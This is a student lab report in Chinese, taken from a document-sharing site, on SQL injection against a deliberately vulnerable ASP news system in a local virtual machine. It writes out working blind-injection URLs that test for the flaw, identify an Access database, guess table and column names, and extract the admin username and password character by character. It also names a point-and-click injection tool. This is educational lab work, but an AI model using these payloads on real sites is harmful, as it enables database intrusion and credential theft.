SQL注入攻击实验报告

上传人:pu****.1 文档编号:554727054 上传时间:2023-02-07 格式:DOC 页数:16 大小:1.87MB
返回 下载 相关 举报
SQL注入攻击实验报告_第1页
第1页 / 共16页
SQL注入攻击实验报告_第2页
第2页 / 共16页
SQL注入攻击实验报告_第3页
第3页 / 共16页
SQL注入攻击实验报告_第4页
第4页 / 共16页
SQL注入攻击实验报告_第5页
第5页 / 共16页
点击查看更多>>
资源描述

《SQL注入攻击实验报告》由会员分享,可在线阅读,更多相关《SQL注入攻击实验报告(16页珍藏版)》请在金锄头文库上搜索。

1、 实验报告实验名称 :SQL注入攻击一、实验目的 通过SQL注入攻击,掌握的工作机制,认识到SQL注入攻击的防措施,加强对Web攻击的防。二、实验环境描述实验开展所基于的网络环境,给出网络拓扑、IP地址、web效劳器、客户机等信息。宿主机客户机:操作系统为Windows 10,IP为192.168.18.11,在主机上安装虚拟化软件 Vmware Player,在此根底上创立虚拟机并安装操作系统,进展网络配置,采用环回适配器,桥接模式,实现宿主机与虚拟机之间的网络通信,虚拟机Web效劳器:操作系统为Windows XP,IP为192.168.18.9,本实验利用 windows 的 iis 效

2、劳搭建了一个有 SQL 注入漏洞的“ASP 新闻发 布系统,以该为目标,对其实施 SQL 注入攻击。本实验所需工具如下:IIS 是 Internet Information Server 的缩写,是微软提供的 Internet 效劳器软 件,包括 Web、FTP、Mail 等效劳器,也是目前常用的效劳器软件。版本不限。 “啊 D注入工具:对“MSSQL 显错模式、“MSSQL 不显错模式、“Access等数 据库都有很好的注入检测能力,集“跨库查询、“注入点扫描、“管理入口检测、 “目录查看等等于一身的注入工具包。 “ASP 新闻发布系统Ok3w v4.6 源码。三、实验容 一配置实验环境,首

3、先选择网络适配器,安装环回适配器,在主机上安装Vmware Player,成功启动虚拟机。接着配置宿主机和虚拟机的IP,如图要注意的是,配置主机上的IP时,应该选择VMnet8,并且注意勾取Bridge然后,验证宿主机和虚拟机是否联通,结果显示连接成功。最后在虚拟机上安装IIS程序,翻开浏览器,输入地址“127.0.0.1,检查搭建情况。成功!二寻找注入点在宿主机上,翻开网页192.168.18.9/list.asp?id=95,可以正常翻开页面。 进展注入测试,键入 192.168.18.9/list.asp?id=95 and 1=1,返回页面不变。键入 192.168.18.9/list

4、.asp?id=95 and 1=2,返回页面出错。 因此,可确定该存在注入点。三判断数据库类型用系统表的方法进展判断,分别键入192.168.18.9/list.asp?id=95 and (select count(*) from sysobjects)0192.168.18.9/list.asp?id=95 and (select count(*) from msysobjects)0两者返回均出错,可知是 access 数据库。四猜想表名一般后台的管理员都默认在表 admin 中,我们先试一下,键入:192.168.18.9/list.asp?id=95 and (select cou

5、nt(*) from admin)0返回页面正常,可知该后台数据库中存在着表名为 admin 的表。五猜想字段名不同公司有不同的字段名,但一般都有三个字段,分别记录 ID 号、用户名和密码,常用的字段名为:id,username,password。分别键入 192.168.18.9/list.asp?id=95 and (select count(id) from admin)0 192.168.18.9/list.asp?id=95 and (select count(username) from admin)0 192.168.18.9/list.asp?id=95 and (select

6、 count(password) from admin)0 三者返回均正常。 可知,表 admin 中存在的三个字段:id,username,password。注:“username的截图损坏,但是返回正常,望教员通融。六猜想管理员用户名和密码 1.确定表 admin 中有几条记录,键入 192.168.18.9/list.asp?id=95 and (select count(*) from admin)=1 返回页面正常。 可知,表 admin 只有一条记录。 2.猜想用户名长度,键入 192.168.18.9/list.asp?id=95 and (select len(username

7、) from admin)=1 返回出错,继续键入 192.168.18.9/list.asp?id=95 and (select len(username) from admin)=2 返回出错,继续测试 3/4/5,直到返回页面正确。测试到 5 的时候,返回正常。可知,用户名长度为 5。 3.猜想用户名容,采用 ASCII 码分析法先猜想第1 位,用二分法,键入 192.168.18.9/list.asp?id=95 and (select count(*) from admin where (asc(mid(username,1,1)between 30 and 125)0 返回正确,进

8、一步缩小围 between 70 and 100 ,between 85 and 100 ,between 90 and 100,=97。可知第一个字符为 a。 依此类推,猜想之后的每一位字符,最后得到用户名为 admin。4.猜想密码,同理: 192.168.18.9/list.asp?id=95 and (select len(password) from admin)=6 所以密码为6位。最终得到密码为 6 位:123456。七寻找到后台管理窗口 翻开“啊 D软件,点击进入“管理入口检测选项,点击“检测管理入口,进展检测,如图:翻开检测到的各网址,测试是否为管理入口。 可知 192.16

9、8.18.9/admin/index.asp 为管理入口,如图:八登陆后台 找到后台管理窗口,192.168.18.9/admin/ad_login.asp,用刚刚得到的用户 名和密码登陆,后台登陆成功。四、实验结果及分析SQL注入攻击过程。 1) 判断Web环境是否可以SQL注入。如果URL仅是对网页的访问,不存在SQL注入问题,如:news.xxx./162414739931.shtml就是普通的网页访问。只有对数据库进展动态查询的业务才可能存在SQL注入,如: 192.168.18.9/list.asp?id=95,其中?id95表示数据库查询变量,这种语句会在数据库中执行,因此可能会给

10、数据库带来威胁。 2) 寻找SQL注入点。完成上一步的片断后,就要寻找可利用的注入漏洞,通过输入一 些特殊语句,可以根据浏览器返回信息,判断数据库类型,从而构建数据库查询语句找到注入点。 3) 猜解用户名和密码。数据库中存放的表名、字段名都是有规律可言的。通过构建特 殊数据库语句在数据库中依次查找表名、字段名、用户名和密码的长度,以及容。这个过程可以通过网上大量注入工具快速实现,并借助破解轻易破译用户密码。 4) 寻找WEB管理后台入口。通常WEB后台管理的界面不面向普通用户开放,要寻找 到后台的登陆路径,可以利用扫描工具快速搜索到可能的登陆地址,依次进展尝试,就可以试出管理台的入口地址。 5) 入侵和破坏。成功登陆后台管理后,接下来就可以任意进展破坏行为,如篡改网页、 上传木马、修改、泄漏用户信息等,并进一步入侵数据库效劳器。实验心得:在实验的过程中遇到了很多困难,配置上的,环境上的,还有一些需要注意的小问题,而且从整个实验的过程来讲也涉及到了很多软件的配合使用。在整个实验中遇到的最大问题就是,宿主机和虚拟机此前一直连不通,通过宿主机ping虚拟机,一直无法连接。直到最后我把虚拟机的防火墙关闭了,宿主机才能访问虚拟机上发布的网页。可见,防火墙还是有一定作用的,但是对于来说开通了防火墙就没方法访问网页了。 /

展开阅读全文
相关资源
正为您匹配相似的精品文档
相关搜索

最新文档


当前位置:首页 > 建筑/环境 > 施工组织

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号